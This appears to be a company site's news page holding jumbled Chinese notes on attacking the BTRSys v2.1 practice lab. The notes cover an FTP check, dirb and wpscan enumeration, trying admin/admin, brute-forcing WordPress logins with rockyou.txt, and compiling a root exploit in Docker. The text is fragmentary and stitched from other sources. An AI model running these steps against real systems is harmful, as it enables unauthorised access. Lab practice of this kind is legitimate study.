ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

BTRSys: v2.1

BTRSys: v2.1 看了一眼web有点恶心这里的searchsploit暂时保留OSCP系列靶场-Intermediate-BTRSys2.1 - FreeBuf网络安全行业门户ftp可以匿名登录但是上传不了东西dirb http://192.168.41.150robots.txtwordpress新东西 漏洞扫描# 针对wordpress的专用扫描器 # -e枚举 ap枚举插件 u枚举用户名 t枚举主题 wpscan --url http://192.168.41.150:80/wordpress/ --enumerate ap,u,t万能密码或者说万能用户总有一个会告诉你错误弱密码admin admin进入或者爆破echo btrisk admin user.txt # 暴力破解 wpscan --url http://192.168.234.50:80/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txtVulnHub BTRsys-2 进行渗透测试的总结与过程_btrsys vulnhub-CSDN博客文件路径参考dirb目录扫描结果遇上了libc不存在问题使用docker部署ubuntu16容器编译解决docker pull ubuntu:16.04124 docker run -it --name btrsys-compiler ubuntu:16.04 /bin/bash125 sudo docker cp btrsys-compiler:/root/getroot /home/kali/桌面/getroot126 ls -l /home/kali/桌面/getroot
返回列表